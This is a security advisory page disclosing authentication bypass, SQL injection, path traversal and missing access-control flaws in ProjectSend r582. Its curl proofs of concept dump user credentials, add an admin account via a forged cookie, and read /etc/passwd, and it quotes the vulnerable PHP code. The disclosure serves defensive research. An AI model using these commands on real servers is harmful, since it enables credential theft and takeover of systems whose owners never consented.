exploit the possibilities

ProjectSend r582 Bypass / SQL Injection / File Read

ProjectSend r582 Bypass / SQL Injection / File Read
Posted Jan 29, 2016
Authored by Filippo Cavallarin

ProjetSend version r582 suffers from authentication bypass, remote SQL injection, insecure direct object reference, and directory traversal / arbitrary file read vulnerabilities.

tags | exploit, remote, arbitrary, vulnerability, sql injection
MD5 | 8a8ca63e1ef564c23c17f2ea23ca1e65

ProjectSend r582 Bypass / SQL Injection / File Read

Change Mirror Download
Advisory ID:  SGMA-16001
Title: ProjectSend multiple vulnerabilities
Product: ProjectSend (previously cFTP)
Version: r582 and probably prior
Vendor: www.projectsend.org
Vulnerability type: SQL-injection, Auth bypass, Arbitrary File Access, Insecure Object Reference
Risk level: 4 / 5
Credit: filippo.cavallarin@wearesegment.com
CVE: N/A
Vendor notification: 2015-11-05
Vendor fix: N/A
Public disclosure: 2016-01-29


ProjectSend (previously cFTP) suffers from multiple vulnerabilities:


- SQL Injection

The script manage-files.php suffers from a SQL-Injection vulnerability because the request parameter
"status" is used to build a sql query without beeing properly sanitized. In order to exploit this issue,
an attaccker must be logged into the application as a non-privileged user.
The following proof-of-concept demostrates this issue by downloading login credentials of registered users:

curl -X POST 'http://projectsend.local/manage-files.php?client_id=1' -H 'Cookie: PHPSESSID=hiefdo3ra5hgmpa5mrpdfhih22' --data "status=10' and 0 union select 0,1 ,'0) or 1 union select 0,1,concat(user,char(32),password),3,4,5,6,7,8,9 from tbl_users -- a',3,4,5,6,'7"



- SQL Injection

The script manage-files.php suffers from a SQL-Injection vulnerability because the request parameter "files"
is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must
be logged into the application as a non-privileged user.
The following proof-of-concept demostrates this issue by injecting a SLEEP command into the database engine:

curl -X POST 'http://projectsend.local/manage-files.php' --data 'files_actions=delete&do_action=&files%5B%5D=5) OR 1=sleep(10' -H 'Cookie: PHPSESSID=hiefdo3ra5hgmpa5mrpdfhih22'



- SQL Injection

The script clients.php suffers from a SQL-Injection vulnerability because the request parameter "selected_clients"
is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must
be logged into the application as a non-privileged user.
There is no POC available, but the vulnerability is easy to spot by looking at the source code at line 63.

$selected_clients = $_POST['selected_clients'];
$clients_to_get = mysql_real_escape_string(implode(',',array_unique($selected_clients)));
$sql_user = $database->query("SELECT id, name FROM tbl_users WHERE id IN ($clients_to_get)");



- SQL Injection

The script clients.php suffers from a SQL-Injection vulnerability because the request parameter "status" is used to
build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged
into the application as a non-privileged user.
There is no POC available, but the vulnerability is easy to spot by looking at the source code at line 146.

$status_filter = $_POST['status'];
$cq .= " AND active='$status_filter'";
[...]
$sql = $database->query($cq);



- SQL Injection

The script process-zip-download.php suffers from a SQL-Injection vulnerability because the request parameter
"file" is used to build a sql query without beeing properly sanitized.
There is no POC available, but the vulnerability is easy to spot by looking at the source code.

$files_to_zip = explode(',',substr($_GET['file'], 0, -1));
[...]
foreach ($files_to_zip as $file_to_zip) {
[...]
$sql_url = $database->query('SELECT id, expires, expiry_date FROM tbl_files WHERE url="' . $file_to_zip .'"');



- SQL Injection

The script home-log.php suffers from a SQL-Injection vulnerability because the request parameter "action" is used
to build a sql query without beeing properly sanitized.
There is no POC available, but the vulnerability is easy to spot by looking at the source code.

$log_action = $_GET['action'];
$log_query = "SELECT * FROM tbl_actions_log";
if (!empty($log_action)) {
$log_query .= " WHERE action = '$log_action'";



- Authentication Bypass

An Authenticaton Bypass vulnerability has been discovered in multiple pages.
By adding a cookie to request it is possible to bypass certain authentication checks and gain access to
protected resources.
The following proof-of-concepts are available:

Lists all registered users:
curl http://projectsend.local/users.php -H 'Cookie: userlevel=9'

Add an Admin user to the database:
curl http://projectsend.local/users-add.php -H 'Cookie: userlevel=9' -X POST --data 'add_user_form_name=necci&add_user_form_email=poplix@papuasia.org&add_user_form_level=9&add_user_form_user=necci&add_user_form_active=1&add_user_form_pass=123456'

Read file statsictics:
curl http://projectsend.local/home.php -H 'Cookie: userlevel=9'

Read file details:
curl http://projectsend.local/edit-file.php?file_id=1 -H 'Cookie: userlevel=9'

Bypass authentication:
curl 'http://projectsend.local/process-zip-download.php' -H 'Cookie: userlevel=8'


- Arbitrary File Download

The page process-zip-download.php fails to restrict access to local files.
By injecting a path traversal vector into the "file" parameter it is possible to read an arbitrary
file from the server.
By combining this vulnerability with the Authentication Bypass affecting the same file, is possible
for a non-authenticated user to gain access to protected data.
The followinf proof-of-concept is available.

curl 'http://projectsend.local/process-zip-download.php?file=../../../../../../../../etc/passwdd' -H 'Cookie: userlevel=8' > ttt.zip



- Insecure Direct Object References

The page actions.log.export.php fails to perform authentication checks so it's possible for
anyone to access logs data.
The followinf proof-of-concept is available.

curl http://projectsend.local/includes/actions.log.export.php




Solution
No solution is available at the time of writing.
The vendor has been contacted about three months before the public disclosure, but he stopped r
esponding after we sent him our report.




References
https://www.wearesegment.com/research/Projectsend_multiple_vulnerabilities
http://www.projectsend.org




Filippo Cavallarin
https://wearesegment.com

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    0 Files
  • 3
    Apr 3rd
    0 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    0 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close